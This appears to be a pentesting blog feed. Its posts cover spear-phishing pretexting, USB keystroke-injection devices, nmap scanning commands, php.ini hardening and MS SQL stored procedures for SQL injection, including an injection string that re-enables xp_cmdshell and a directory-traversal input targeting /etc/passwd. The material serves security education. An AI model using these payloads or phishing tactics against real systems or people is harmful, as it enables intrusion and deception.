Quantcast
Channel: PenTesticles
Viewing all 22 articles
Browse latest View live

Welcome to PenTesticles.com

$
0
0
Hello, and welcome to PenTesticles.com. I have finally gotten around to writing a few blog posts and shall be slowly unleashing them upon the world. Any comments welcome and feedback positive or negative always enjoyed. Also, anyone who wants to guest post is welcome to, just tweet me @pentesticles.

Lawrence (and Ben)

Real-life Challenges in Social Engineering as a Penetration Tester

$
0
0

Background

Recently, I’ve been lucky enough to get to work with some interesting clients who’ve wanted some quite openly scoped social engineering tests. It’s not something I do on a really regular basis, but it’s always been a big area of interest and it’s something I enjoy and have hopefully improved at over the last two-and-a-half years.

That said, I’m no guru and neither do I profess that I’m doing anything super-new or revolutionary, I just hope that this helps some other testers out there who’re facing similar challenges and opens the door to a few discussions and interesting comments. Any feedbacks or shouts of ‘n00b’ will be eagerly met with an open ear. However, I digress. The following posts are a bit of a ‘brain-spuzz’ discussing how I’ve constructed some of the testing pretexts, discussing what works (and more importantly what doesn’t) when trying to launch a successful Social Engineering campaign. This is a particularly effective way of attacking organisations where they have effective Network perimeter controls.

However, in the money-centric world of IT, it’s often hard to get buy-in to the idea that testing this sort of attack vector is a.) fair or b.) representative of what’s happening (especially in the context of large or public sector organisations) in the wild. It can often be very difficult in pre-sales meetings to ‘tack-on’ a few extra days to conduct social engineering, let alone scope a comprehensive engagement as many info sec managers are quite old-school (or constrained by budget) and prefer to leave this out of scope. One technique to encourage inclusion, is to make social engineering implicit in your testing methodology by presenting a scope where social engineering is intertwined with other areas of assessment. This can be either technical (such as creating website clones) or processual (such as spoofing a phone call to a service desk to persuade them to give you password reset information) – I’m not saying these are the only areas of social engineering, but it’s one way to split things out quite generally without thinking too deeply about specific attacks. Blended, rather than staged modular attacks, are (in my humble opinion) much more effective and better value for clients.

Spear Phishing – Part 1 – OSINT and Pretexting

Firstly, as I’m sure most testers, IT security folks and Wikipedophiles are aware, Spear Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication which is specifically tailored to entice a user to perform an action that will compromise their data and/or client machine. Information specific to the individual(s) targeted, is gathered and used to elicit a specific response desired by the attacker, for example opening a PDF or clicking on a link.

The idea for these posts came after a recent engagement with a client, which called specifically for a tailored Spear Phishing attack, with no prior information pertaining to the targets, apart from a company name and website. Although this seems fairly contrived, when given a short time-scale it may be best to agree a single attack vector with the client as it will set some boundaries but also keep you on track and stop the ‘magpie effect’, which I know a lot of testers suffer from. The downside of this approach is that it will remove a lot of creativity, which can often spawn the best attacks.

With very little information provided, the obvious place to start is footprinting (or OSINT gathering) as is fairly standard (when looking at methodologies such as the rather bloated OSTMM and new kid on the block PTES). The first tool I always reach for in this scenario is FOCA. I have moved away from Maltego somewhat after annoying licencing issues with transforms, impossible to obtain API keys and their development effort seeming to push towards visualisation of data structures. However, a great presentation of the latest release by Roelof at 44Con may persuade me to try again.

FOCA is an amazing tool, it has many interesting functions (some only available in the pro version), but the part that will be of most interest is document grabbing and metadata extraction. It is possible to point FOCA at a URL and for it to locate and then download (if instructed) all the files on the site and extract all the metadata from the documents. If you’re not familiar with the type of information contained within the metadata of office documents and PDFs, you will probably be surprised at the things you can find (e.g. usernames, software versions, internal paths and email addresses). The main value of this, is that it provides reams of data pertaining to the internal workings of the organisation you’re targeting. Information such as usernames can help you work out the naming convention they’re using for AD for example. Moreover, cross-referencing the usernames with machine names and email addresses means that you can start building up individual profiles of your targets, which can then be combined with more generic social media and Google searches to create detailed anthologies of your targets. If there is more time at this stage, I would recommend using Maltego with some of the information gathered, as this sort of cross-referencing is what the tool is good at. In terms of information gathering a really good tool for storing all the raw information in is ‘BasKet’; those of you who’ve read ‘Social Engineering: The Art of Human Hacking’ by Chris Hadnagy will already be familiar with this tool. However, if your base OS is Windows, OneNote in MS Office is also great as an informational dumping ground and note-taking muse.

Once the profiling is completely, or more importantly, the time you have allocated for this phase of testing is, it’s a good time to start conceiving of a pretext for the attack (if you haven’t already). Pretexting, as defined by Hadnagy, is “the act of creating an invented scenario to persuade a targeted victim to release information or perform some action”. To invent a believable pretext is often more tricky than it sounds, but it’s key to eliciting the desired response from the target. This is the point at which all the scraps information you have gathered becomes important, as a pretext that is directly related to your targets that is straightforward, is more likely to work. A goldmine of information I have found useful is the LinkedIn search using the ‘updates’ filter. Organisations are using LinkedIn more and more and you’d be surprised at some of the internal discussions that happen on public forums. Obviously, this is no substitute for solid Googling techniques, Twitter traipsing and Bing bashing, but it’s a good starting place and my ‘top tip’. Once you have done this a few times, the right subjects tend to jump out at you.

When you have found something suitably ‘buzzy’ or controversial that will tweak people’s interest enough to invoke a response, it’s time to start thinking about logically combining a PDF or a malicious URL to the pretext. Key questions to ask yourself are:

Who would send information pertaining to this pretext, based on my research?
Who would receive this email?
What would motivate the targets to open the email / attachment?

An example of a good pretext I have used was created using LinkedIn. I saw that the organisation had upset quite a few people over a new policy change that would affect a lot of people in the industry and the public. The inner decision making process was exposed by staff discussions in attack and defence of the organisation. These types of people are great targets as they’re obviously vocal on the topic, so the appearance of an email from someone high up in the company (perhaps with a fake email chain below saying ‘<insertname> has some great ideas on this’) will be too enticing to miss; Even if it’s been blocked by a third party email filter and held in quarantine!

With those questions answered, you’re in a good place to create a plan of attack and start addressing technical aspects of the test (which I’m sure most testers will have been doing all along). I think that’s enough for part one of this mini-series; part two will be a lot more technical and discuss the selection of a delivery method (Gmail, SendMail  or another form of open relay), payload (reverse shells etc.), avoiding detection (encoding etc) and the effectiveness of MSF and SET frameworks against in-depth protection. I hope this isn't boring people already!

PHUKDs - An Oldie but a Goodie!

$
0
0
A topic I’ve wanted to blog about for a while is the use of PHUKDs as an attack vector in Penetration testing. Firstly, I’d like to discuss the background of how these devices work and why they have come into being.

A PHUKD is a USB device, which is configured in such a way that it is presented to the victim machine as a USB Keyboard/mouse. The reason this has been developed is so that even when the autorun.inf and U3s are disabled on a machine, malicious inputs can be delivered to the victim quickly, accurately and in an automated fashion. Therefore, the key benefits of these devices as delivery systems are that it cannot be blocked by U3 and autorun process blocking and keystrokes can be precompiled and run quickly on the target machine.

The key benefits to a pen tester:

  • Extremely fast keystrokes, without errors. This is important when physical access time to the target is limited.
  • Works even if U3 autorun is turned off.
  • Draws less attention than sitting down in front of the terminal would. The target turns their head for a minute, the pen-tester plugs in the PHUKD.
  • The HID can also be set as a logic or time-bomb.
  • It is possible to embed a hub and a flash drive in your package so that you have storage and the programmable USB HID into a single package.
  • Embed your device in a USB toy or peripheral and give it to your target as a 'gift'. Packaging that looks like a normal thumb drive is also an option.
  • After your Trojan USB device is in place, program it to "wake up", mount on-board storage, run a program that fakes an error to cover what it is doing (fake BSOD for example).
I still think that these are completely relevant devices and really effective if you can penetrate the boarders of an organisation on a test.

A detailed guide on creating PHUKDs is available on the link provided above to irongeek’s blog post and a really interesting video from an old DefCON talk is included below. It’s also worth noting that it’s possible to integrate this attack using Metasploit. The full details of their Teensy USB HID Attack Vector are available here.

SID de-duplication

$
0
0
On the 3rd November 2009, Sysinternals retired ‘NewSID’, a utility that changes a computers machine Security Identifier (machine SID), but why? I still see people cloning virtual machines as a stardard task, but does it really need to be done?

What is a SID?

A Security Identifier (commonly abbreviated to SID) is a unique name (an alphanumeric character string) which is assigned by a Windows Domain controller during the log on process that is used to identify a subject, such as a user or a group of users in a network of NT/2000 systems.

How are duplicate SIDs created?

For those who are unfamiliar with the concept, when machines are cloned using imaged systems the new machine will contain the same SID as the original. If two machines have the same machine SID, then accounts or groups on those systems might have the same SID.

Common sense in de-duplication?

As most IT professionals who work with virtual technologies will attest, when creating virtual machines from templates, conventional wisdom dictates that the new machine’s SID must be changed as the clone retains a facsimile of the parent’s. However, Mark Russinovic (Microsoft Fellow, OS Guru and creator of ‘NewSID’)and Microsoft have delved deeper into this idea and concluded that changing the SID of machines that contain facsimile entries is unnecessary. This came to light when Mark was investigating bugs with NewSID in windows Vista, he realised that he could not conceive of a scenario where duplicate SIDs could cause a security risk / vulnerability. Mark took this concept to Microsoft’s Windows security and deployment teams and no one could come up with a scenario where two systems with the same machine SID, whether in a Workgroup or a Domain, would cause an issue – further investigation by Microsoft is yet to find such a risk. Food for thought next time you clone a machine.

To view the entire article, please see Mark’s blog:

http://blogs.technet.com/markrussinovich/archive/2009/11/03/3291024.aspx

Facebook and Google Installed on my Windows 7 Machine?

$
0
0

As a fairly utilitarian Windows user, I like to have my machine stripped down with a lot of bells and whistles turned off. Especially all the hindrances, I mean 'simplifying features' that Microsoft have added in more contemporary versions.

 As most advanced users of Windows know, to keep it running well requires quite a lot of forethought and maintenance; especially if you're using it for testing when a very specific Windows-only tool is required or Linux-Java-Fails ensue. I regularly check my boot options, what services are running and what will run at start-up using msconfig.exe. This is a great little tool (if you don't already know it) that's built into Windows and gives a very simple view of what's going on. This can be launched from 'run' or in Windows Vista and later, by typing it into the search box on the start menu and hitting enter.

I checked msconfig recently, and found that two new services had appeared, one listed as Facebook Update and one listed as Google Update. My first reaction was that I'd been pwned, perhaps by one of the niche fetish porn websites I frequent or all the emails from dead relatives in Asia who've left me millions(?). However, upon further investigation (Googling for 30 seconds), I discovered that they were indeed genuine (in my case). I just wanted to share this with anyone who isn't aware and see if anyone knows a bit more about what information they could be gathering alongside performing their special tasks.

FacebookUpdate.exe is concerned with integrations with Skype and other services through Facebook.com, webcam services etc.

Google state that "GoogleUpdate.exe is a software component that acts as a meta-installer and auto-updater in many downloadable Google applications, including Google Chrome. It keeps your programs updated with the latest features. More importantly, GoogleUpdate allows your Google applications to be rapidly updated if security flaws are discovered,"

A summary of the findings is show below:

FacebookUpdate.exe

Full path on a computer: Appdata\Local\Facebook\Update\FacebookUpdate.exe MD5: 3cbc69a4fa0e2432fafaa559b83dc077 SHA1: 9e550c32bda4ef515336729f4f52e43f1439f9d8
Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Facebook Update: “Appdata\Local\Facebook\Update\FacebookUpdate.exe” /c /nocrashserver”
Internet connections to: dragon.ak.fbcdn.net, www.download.windowsupdate.com, crl.verisign.com, www.facebook.com. 

More information can be found at: http://greatis.com/blog/not-a-virus/facebookupdate-exe.htm 

GoogleUpdate.exe

Full path on a computer: \AppData\Local\Google\Update\GoogleUpdate.exe
Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Facebook Update: “Appdata\Local\Google\Update\GoogleUpdate.exe /c” Internet Connections: Unknown (probably all sorts!)

More information can be found at: http://googlesystem.blogspot.com/2008/10/invisible-googleupdateexe.html , http://www.ghacks.net/2008/12/28/googleupdateexe/

Obviously, this can, will or even has been hijacked or impersonated (various findings online), so check that they're genuine with Google and Facebook and MD5 hashes.

Easter Egg in Burp Suite 1.4.01

$
0
0

After an impromptu iMessage from a hacking bud (poojinky), just as I was closing up burp for the day after an epic web app test; my day was made a bit more amusing. There may be more, but there is at least one amusing hidden 'feature' in Burp that will give you a chuckle. So, I'll get straight to it...

1. Start up Burp and point the browser you're using it with to any site.
2. Right-click the target IP or URL in 'Target > Site Map' and select 'Simulate manual testing' (my favourite feature I must say, after Intruder).
3. With the manual testing simulator open, click on the window to focus on it.
4. Type 'burp' (without the ''s).
5. LOL.

Props to Dafydd for being a funny guy.

(I would take screenshots for the less familiar, but it would give it away!)

Introductions, Automation and Simplification

$
0
0


Ok, so time to introduce myself, I'm Ben (bdpuk) I've been a tester for over 5 years and like every other tester out there I spend much more time reading blogs than writing them. This is hopefully about to change.

So my latest obsession is automation and simplification. Put quite simply, getting the grunt work out of the way to make time for the fun stuff. This applies across the board in testing, but really shines through when dealing with internal network assessments or "Evil Insider" type scenarios.

Now I'm not advocating point and shoot ownage, that would be downright irresponsible (see db_autopwn as to why). I'm talking about data collection and aggregation to allow for quick analysis and more to the point less time on customer site.

I think the way this is going to work (if it works at all) is for each post I'm going to write about a few one liners or useful tools that can eventually be put together into one all incompassing framework, the scripts will collect all the required information, process it for use and also hopefully display it in a useful/pretty way. Kind of like a lego project that you attempt to complete over a few weeks, some weeks you might cover a lot, others nothing, maybe a few drastic revisions here and there and in the end you might never complete it, but it's the experience that counts right?

So we're going to start with a subnet, and lets for arguments sake call the subnet 10.10.10.0/24 (one I can remember throughout this series), that'll be our starting point and from here we'll start the datamining. First things first, a lot of tools don't accept CIDR notation (think onesixtyone et al) so we'll need a list of IPs. NMaps list scan comes in handy here:

nmap -sL -n 10.10.10.0/24 | grep "Nmap scan" | cut -f 5 -d " " > ~/<target_org>/targets/IPs.txt

To break that down we're using the nmap list command to produce a list of targets without actually scanning them, and then manipulating the output with grep and cut to provide only a list of IPs.

In the file structure we should save it as IPs.txt in a targets folder, something a long the lines of:

~/<target_org>/targets/IPs.txt

That's a good place to draw to a close on this article, It will continue...

Ninja Edit: Part 2 is located here.

Installing BT5 from CLI on Machines Running NVidia Graphics Cards with No Networking (n00b friendly version!)

$
0
0

The following blog post has been created to bring together a lot of information (some of which you may already know) pertaining to installing BackTrack 5 successfully onto systems that have NVidia graphics cards. For the Linux pros out there, you may be thinking ‘LOL WTF n00b! That’s easy you just set the boot param ‘nomodeset’ in grub then do ‘apt-get install nvidia-common’, but in a lot of cases that won’t work, due to hardware restrictions (e.g. encrypted drives) and the way that Live CDs work. Plus, not everyone has time to Google every issue or knows GRUB parameters off the top of their head’s.

The main reason for doing this (apart from just wanting BackTrack installed on your machine – too much to ask?) is that for carrying out certain types of protectively marked work (government stuff) you are required to image and re-image a lot and troubleshooting this sort of process is a real pain in the arse, so I thought I would be nice and put it all in one place. I hope it proves useful!

  •  Insert the BT5 Live CD and select the 4thOption on the list (BackTrack Text – Default Boot Text Mode). This differs from the first option as it has ‘nomodeset’ in the Kernel parameters, meaning the system will actually boot!
  • Next, find out what graphics card you have installed on your machine, you can do this by typing the following command.
    $ lspci
  •  Download the corresponding driver from the NVidia website (http://www.nvidia.com/Download/index.aspx).
  • Copy the driver script (.run file) onto a FAT32 formatted USB stick.
  • Double click the ‘Install BackTrack’ icon on the Desktop and install BT on the whole disk (set regional options etc.).
  • Once this is complete and you restart, the problem you’ll have now is that you won’t be able to boot into BackTrack as it doesn’t have the correct graphics card driver installed. So, you will need to follow the following steps.
  • Upon bootstrapping, drop into the GRUB menu (either by hitting shift of the down arrow, it depends on your machine). 
  • From here you need to find the operating system you have just installed (it should be the top option), and with it highlighted, press ‘E’ to edit the script. 
  • Move the cursor with the direction arrows until you get to the line that startslinux /boot’.
  •  Towards the end of the line (or continued onto the next line) where the file readsquiet splashthere may be some code with something similar to ‘VGA 740’, if there is, delete it and replace it withnomodeset’. If there is not, just enternomodesetafterquiet splash’.
  • Press Ctrl+X to boot the modified grub entry. Backtrack should now boot to the familiar text prompt. From here, we need to source and install the NVidia drivers.
  • Insert the USB stick with the drivers on that you copied over earlier.
  •  Mount the USB stick on your machine and copy the file to your Desktop by doing the following steps below.Tail the logs using the command below, so that you can see the USB log entries as it’s plugged in:

         $ tail -f /var/log/messages

  •  Plug in the USB device and Look for a line similar to this:

      Jan 17 11:53:25 <your-hostname> kernel: [81590.537888] sdb: sdb1

  •  Your device name will be named '/dev/<device>' which in this example is '/dev/sdb1'. Create a new directory within /media/ called 'usbdrive' with the following command:

      $ mkdir usbdrive

  • Mount the USB device in this location using:

      $ mount -t vfat /dev/sdb1 /media/usbdrive/

  •  After the USB has been mounted, browse to it to check that the driver file is there, then copy it to your machine:

   $ cp <NVIDIA_Linux_x86_64-XXX.XX.run> /home/root/Desktop

  • Now, you need to install the drivers, this can be a bit tricky so make sure you follow the steps exactly.
  • Type: 'prepare-kernel-sources'as this installation requires the Kernel sources to be unpacked for the driver script to run.
  • Copy the ‘include/generated’ folder and all its contents to ‘include/linux’ with the following commands:

   cd /usr/src/linux
   cp -rf include/generated/* include/linux/

  • Run the NVidia driver script using the following command:

     ./NVIDIA_Linux_x86_64-XXX.XX.run --kernel-source-         path='/usr/src/linux'

  • This will start NVidia driver script. At the first screen click ‘Accept’ in order to accept the install agreement.
  • When the install asks “Install NVIDIA’s 32-bit compatibility OpenGL libraries’, select ‘Yes’.
  • The next prompt will ask if you wish to update your X configuration file, click ‘Yes’.
  • Hopefully, this will now give a successful update message! Click ok and then type ‘startx’ to begin the GUI. 
  • Now, you need to edit '/boot/grub/grub.cfg' to make a permanent to the boot parameter. Locate the first entry and delete 'VGA 740' and replace it with 'nomodeset'. 
  • Reboot the machine.
  • Shout huzzah / WTF!



The Awkward Sophomore Blog Post - The (first) NMAP Post

$
0
0

I'm back, the other nut from this ballsy pair (that'll be the last time I make those jokes I promise). So where were we? (We were here if you missed the previous post) We had a network range, 10.10.10.0/24 and we'd split the range down into a list of IP addresses for the awkward tools that don't like CIDR notation, that and we've dumped the file into the beginnings of our data file structure. Recap over and on we go.

So what's next? We have a number of set and forget operations that need to run, the kind of data that takes a long time to collect but we need to get anyway, you all know what I'm talking about, the good old full 65535 ports tcp/udp/version/OS scan.

First things first let's set up some variables, it'll make life easier in the long run and sets a good precident for when we come to script these things up. First lets set the range, nice and simple in bash, at the prompt type:

root@bt:~# range=10.10.10.0/24

Next we need to set our own IP address so that we can get rid of it, if you're cabled into a subnet the last thing you want to do is panic about a BT5 box on their network when it turns out to be your own. Once again nice and simple at the prompt type:

root@bt:~# myip=`ifconfig eth1 | grep "inet addr:" | cut -d : -f 2 | cut -d " " -f 1`

We can now use both of these going forward. Does anyone here like screen? I like screen, it's a good way of compartmentalising your work and more importantly if you're working on a remote box you can keep your sessions active without using nohup, big bonus.

First lets bang out the pingsweeps, if we're local it's good to have an idea of what's actually responding. There's no point in scanning devices we know from the arp cache don't exist, of course if this is remote then skip ahead. The ARP sweep in NMap allows us to do this quite easily:

nmap -sP -PA -vv -n -oA pingsweeps/pingsweep.arp $range --exclude $myip > /dev/null 2>&1 && cat pingsweep.arp.gnmap | grep Up | cut -f 2 -d " " > targets/targets.txt

For completeness (don't we all love piles of data) lets cover all the ping sweeps, they don't take long.

nmap -sP --send-ip -PE -vv -n -oA pingsweep.icmpecho -i targets.txt > /dev/null 2>&1
nmap -sP --send-ip -PP -vv -n -oA pingsweep.icmptstamp -i targets.txt > /dev/null 2>&1
nmap -sP --send-ip -PM -vv -n -oA pingsweep.icmpmask -i targets.txt > /dev/null 2>&1

Right now onto the actual scans. Although they take forever and we don't get tangeable, workable results from them straight away (watch this space for that) they need to be done.  Your scan preferences may differ but I find these acceptable for most engagements.

screen -S "full-tcp" -d -m nmap -sSVC -p- -n -vv -oA port_scans/portscan.tcp.full -i targets.txt --max-retries 1

screen -S "full-udp" -d -m nmap -sU --max-scan-delay 0 --max-retries 1 -n -vv -oA port_scans/portscan.udp.services -i targets.txt

The joy of screen is that these truly are set and forget and at any time you can type screen -r <scan_name> to check their progress (if you feel so inclined) it beats the usual ps -ef | grep nmap that we're all used to or heaven forbid tailing the nohup.out file.

Sidenote: So the big issue with NMap is that if it gets stuck on a host a ctrl-c usually means losing all the results you've gained so far. Seeing as we have a targets file we can write a wrapper that scans each ip address individually, that way if NMap hangs on a host you can ctrl-c and just carry on with the next host. It'll look something like this:

while read line; do `nmap -sSVC -p- -n -vv -oA $line.tcp.full $line --max-retries 1`; done < targets.txt

Of course you then have to bring all of the results back together again, there are a few scripts out there that achieve this, if I can dig one out I'll link it.

Back to the main event. While these scans are completing we need something to be getting along with, how many hosts are running web servers? how many snmp? mail servers? etc etc. A quick scan alongside the full ones allows us to start getting this data and passing it onto other software quick sharp. Of course you could always use the --top-ports=<1-4000ish> flag, but I prefer to write my own list, this does the job for me: 

screen -S "hot-targets" -d -m nmap -sSV -p80,443,25,3389,23,22,21,53,135,139,445,389,3306,1352,1433,1434,1157,U:53,U:161 n -vv -oA port_scans/hot-targets.tcp.services -i targets.txt

The greppable output from here can then be thrown directly into tools like nikto, onesixtyone, skipfish etc.

Last bit I want to cover off is non-standard web ports. There are a few ways we can cover them off, firstly we can wait for the full scan to complete and grep for www or http, that would be the most sensible thing to do, and should probably be done no matter what. In the mean time we can search for some:

screen -S "webhosts" -d -m nmap -sSV -p 80,443,81,82,8080,8081,8443,8118,3128,280,591,593 -n -vv -oA port_scans/webhosts.tcp.services -i targets.txt

By no means a conclusive list (please add more in the comments/twitter and I'll update) but it's a good starting point.

That'll probably do for now, before you're all NMaped out, next time we'll go through what we can do with this data now we have it.


Edit for Steve:


After a brief chat with @stevelord on twitter I came to agree that I'd been lazy and left out RTT optimisation for the scanning, it was on my to-do list but I thought I'd wait and do a clean up post at some point, well that point is now, to get an idea of the RTTs for the network you're on you're going to need to do some pinging, and seeing as we have nping why not sure it, what I came up with was this bad boy:


INITRTT=`nping --icmp $(head -5 targets) | grep "Avg rtt" | cut -f 13 -d " " | sort | uniq | awk 'sub("..$", "")' | awk 'NR == 1 { sum=0 }{ sum+=$1;} END {printf "%f\n", sum/NR}' | cut -f 1 -d "."` && MAXRTT=$[INITRTT*4]


This pings the top five hosts in the targets file, averages their RTTs and then multiplies it by 4. This creates the variables INITRTT and MAXRTT and these can then be used in the nmap scans with the flags:


initial-rtt-timeout $[INITRTT]ms & max-rtt-timeout $[MAXRTT]ms


I hope that helps and that your scans end up a bit faster.

BSides London 2012

$
0
0

Recently, both Ben and I were lucky enough to get our grubby mitts on some BSides tickets, which turned out to be a mixed bag, but was still a very worthwhile and well organised event. Overall, it was well thought-out despite one of the speakers going AWOL (Kizz MyAnthia - Mapping The Penetration Tester's Mind: 0 to Root in 60 Minutes). In fact, to fill this slot Paco Hope (@pacohope) from Cigital filled in, with his really interesting talk around online Gambling security focussing on random number generators and shuffling algorithms. This was, very much, a cheeky bonus.

However, I digress. The conference managed to have plenty going on throughout the day, which meant that even if there wasn’t a talk you were particularly interested in, you could either attempt a CTF (with Campbell @zyx2k) or try your hand at the ubiquitous-at-hacking-cons lock picking table. In addition to the two main tracks of talks, there was also a third track which appeared to be an open forum for impromptu talks, for anyone who had something interesting to say. I really liked the idea of this and I managed to catch two of the talks on there. The first talk I saw on this track was more of a discussion, talking about formal education for hacking and how this would serve the industry. I found this quite interesting having done a degree and currently reading a masters by research (MRes) in security and hacking related fields. I gladly proffered my experiences, opinions and advice and found it quite ‘nice’ to be able to be able to muse without needing to have a talk prepared. I’d like to see more of this in a formal setting at cons. The second talk I caught in this track was an impromptu SAP overview by Steve Lord (@stevelord). This was a great talk (as much as I hate SAP and have only done one test), but he made some really good points around the in-house lifecycle of SAP customisations and rushed deployments and misapprehensions by large corporate businesses. Awesome. And what a knowledgeable guy to do it all off the cuff.

On the main two tracks, there were two real highlights for me; HTML5 - A Whole New Attack Vector by Robert McArdle (@bobmcardle) and UPnP - The Useful plug and pwn protocol – revisited by Arron Finnon (@f1nux).

McArdle’s talk walked through the most notable features of HTML5 then progressed onto basic attack vectors including the <video> tag and browser pop-ups. Following this, he discussed the concept of browser botnets and the impact of their creation within a corporate environment. This was a particularly appealing talk as HTML5 has been on my ‘to-do’ list for a while now, due in-part to the uptake of HTML5 moving at the same rate as IPv6 (what’s the name of that Paula Abdul song with the animated Cat?). I often tell myself (and after speaking with other testers I realised that I’m not alone) it can wait a little bit longer as there are 101 things (including my job as a Penetration Tester for HP in there somewhere) to research and learn first. However, it’s now leapfrogged a few places up the list. It’s certainly worth going to http://html5security.org/ and reading up on potential vectors and reading some of the white papers. Great job Robert.
F1nux’s UPnP talk was great also. Having been in the independent state of ‘Web-app-land’, in terms of personal research and learning, for the last year it seems, it was great to see new things being done with an older protocol (that likes to say ‘Yes’ – SEVERE lack of ‘Mum jokes’ following this, but maybe my sense of humour never ventured beyond the playground). The talk explored around the protocol and the information that was freely given by supported devices and several vectors were discussed regarding home routers and the opening of ports via UPnP. I really want to look at the possibilities of screwing with this in VOIP. I really LOVE this type of low-tech elegant hack (worth mentioning how great @wickedclown is at that sorta thing here!) and F1nux really ripped it up (again).

As much as a hate to be negative about a free con, which was informative, well organised and had a free bar at the end, it’s good to be constructive.

So, my main feedback would be to pick more technical talks as my feeling was that some of the talks were a bit too ‘social sciencey’ and didn’t really give any information beyond a message or way of thinking that may be counterintuitive at first. I feel that these types of talks can be delivered by anyone with a point of view who’s been hacking, penetrating or researching  for a year or more, so I found some of them a bit disappointing. Following on from this, I felt that perhaps the target audience was slightly wrong for me as an experienced penetration tester / security consultant. I felt the con wasn’t so much aimed at people like me, but at people who’re new to the industry or grads. In one talk, asymmetric encryption was explained with Alice and Bob (and Eve), I thought this was a little strange and half-expected Bruce Schneier to jump out from behind the curtain with Alice’s private key.

Overall though, a massive success! Thanks to everyone at BSides for putting on an amazing conference and I look forward to repeated hitting CTRL+F5 in my browser next year to get tickets again.

Interesting Directives in php.ini (for Pen Testers and Devs)

$
0
0

For those of you not overly familiar with PHP; php.ini is where you define your settings. As a penetration tester, you should be used to seeing the symptoms of these settings either not being set or being misconfigured. This post aims to pin-point the directives that developers should be familiar with and also show penetration testers the nuts and bolts of the issues they’re seeing so that they may better advise their clients. Feel free to post any more detail or additional directives that you believe should be included.

disable_functions

The disable_functions directive is very important, as it controls which functions are available to be used or abused. When designing an application, if it does not require high risk functions such as eval(), passthru() and system(), etc. then these functions should be disabled. The disable_functions  directive is not affected by Safe Mode however, only internal functions can be disabled using this directive. User-defined functions are unaffected.

open_basedir

Enabling open_basedir will restrict file access to a specifically defined directory. All file operations will then be limited to what has been specified. It is recommended that any file operations should be located within a certain set of directories. If this is implemented, standard canonicalization for directory traversal e.g. “../../../../etc/passwd” will not work. This directive is not affected by Safe Mode being turned on or off.

When a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is checked. When the file is outside the specified directory-tree, PHP will refuse to open it. All symbolic links are resolved, so it's not possible to avoid this restriction with a symlink. If the file doesn't exist then the symlink couldn't be resolved and the filename is compared to (a resolved) open_basedir .

The special value ‘.’ indicates that the working directory of the script will be used as the base-directory. This is, however, a little dangerous as the working directory of the script can easily be changed with chdir().

In httpd.conf, open_basedir can be turned off (e.g. for some virtual hosts) the same way as any other configuration directive with "php_admin_value open_basedir none".
Under Windows, separate the directories with a semicolon. On all other systems, separate the directories with a colon. As an Apache module, open_basedir paths from parent directories are now automatically inherited. The restriction specified with open_basedir is a directory name since PHP 5.2.16 and 5.3.4. Previous versions used it as a prefix. This means that "open_basedir = /dir/incl" also allowed access to "/dir/include" and "/dir/incls" if they exist. When you want to restrict access to only the specified directory, end with a slash. For example: 

open_basedir = /dir/incl/

The default is to allow all files to be opened.

expose_php

Setting this configuration to off will remove the PHP banner that displays in the server header’s response. This is one layer of defence that will obscure the fact that you’re using PHP (by banner grabbing at least) and moreover the version that is being used and is a good defence-in-depth technique.

allow_url_fopen

This directive is designed to prevent remote file inclusion vulnerabilities from working. An example of this would be if the $absolute_path variable in the following code example were set to a value http://www.randomsite.com; the exploit would fail because allow_url_fopen was set.

include ($absolute_path.’inc/adodb.inc.php’);

display_errors

The display_errors directive is a simple but important setting that enables detailed errors to the user on an exception. This setting should always be switched off in a production environment.

safe_mode

Enabling safe-mode in PHP allows strict file access permissions. This is done by checking the permissions of the owner of the PHP script that is running against any file access that the script attempts. Should the permissions not match, PHP throws  a security exception. Safe_mode is commonly used by ISPs, so that multiple users can develop their own PHP scripts without risking the integrity of the server.

register_globals

When enabled, register_globals injects user created scripts with various variables, such as request variables from HTML forms. This functionality coupled with the fact that PHP doesn't require variable initialization means writing insecure code is much easier. A controversial change in PHP after version 4.2.0 was the setting of register_globals to OFF rather than ON. Reliance on this directive was quite common and many people didn't even know it existed and assumed it's just how PHP works. Many users of PHP didn’t understand how this directive worked as it was always on by default and was assumed the inherent behaviour of PHP on the whole. Even though this was a difficult decision, the PHP community decided to disable this directive by default. When enabled, developers use variables yet really don't know for sure where they are generated and often only assume. Internal variables that are defined in the script itself get mixed up with request data sent by users and disabling register_globals changes this.

NB – register_globals has been deprecated as of PHP 5.3.0 and removed as of PHP 5.4.0.

Summary

The settings within php.ini are not a fix-all by any means, but they provide security-in-depth for any application using PHP. As a penetration tester, it’s important to be able to tell developers what they’re doing wrong when vulnerabilities are discovered and understanding how a scripting language such as PHP works on a global level.  A huge pet hate of mine is when testers (Nessus, Core Impact or <Insert automated web security scanner> monkeys) report an issue, don’t understand what the issue is, don’t provide a working example and don’t explain the impact specific to the application. Apart from providing a poor service (which the client is probably paying £1000 per day for) this creates the understanding that all penetration testers do is ‘run scans’ and it takes a lot of time and conversations with security managers and developers to reverse!  Rant over, I hope this is useful as both a learning tool and for reference.

An additional source of information regarding PHP and its directives can be found here: http://ific.uv.es/informatica/manuales/php/.

MS SQL - Useful Stored Procedures for SQL Injection and Ports Info.

$
0
0


The following post lists and describes various useful stored procedures and port information for MS SQL. The information is relevant for all versions unless stated (there may be a couple of mistakes, so corrections are welcome). The information is from many different sources including MS Technet, various books and several people’s brains (mostly mine - such as it is!). Its main use is as a learning tool or reference for performing SQL injection attacks.

Important Stored procedures

sp_columns– returns column names of tables
sp_configure– Returns internal database settings. Allows you to specific a particular setting and retrieve the value.
sp_dboption– Views or sets user configurable database options
sp_who2 and sp_who– Displays usernames, the client from which they’re connected, the application used to connect to the database, the command executed on the database and several other pieces of info.


Parameterised Extended stored procedures

xp_cmdshell - The default current directory is %SystemRoot%\System32. This procedure is disabled in SQL 2005 onwards by default, but can be re-enabled remotely by running the following command (either as a straight query or as part of an injection):

;exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE

SQLmap (--os-cmd) will do this automatically, but I haven’t had much success with it on real-world test.

xp_regread– Reads a registry value.
xp_servicecontrol– Stops or starts a windows service.
xp_terminate_service– Kills a process based on its process ID.

Non-parameterised Extended Stored Procedures

xp_loginconfig– Displays login information, particularly the login mode (mixed etc) and default login.
xp_logininfo– Shows currently logged in accounts (NTLM accounts).
xp_msver– Lists SQL version and platform info.
xp_enumdsn– Enumerates ODBC data sources.
